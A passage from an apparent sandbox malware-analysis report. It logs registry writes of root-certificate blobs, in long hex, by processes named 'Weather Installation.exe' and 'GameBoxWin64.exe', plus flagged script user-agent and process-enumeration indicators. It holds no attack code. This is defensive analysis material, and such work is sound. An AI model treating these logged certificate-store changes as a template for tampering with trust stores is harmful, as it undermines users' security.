5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B Weather Installation.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 Weather Installation.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd Weather Installation.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 Weather Installation.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E Weather Installation.exe Set value (data) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 Weather Installation.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c000000010000000400000000100000190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254830400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd Weather Installation.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f GameBoxWin64.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 98 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 100 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Installation.exe35SM90SrdCDhcnMYcnmUgvQl.exepid process 3832 Installation.exe 3832 Installation.exe 5516 35SM90SrdCDhcnMYcnmUgvQl.exe 5516 35SM90SrdCDhcnMYcnmUgvQl.exe 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 3132 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
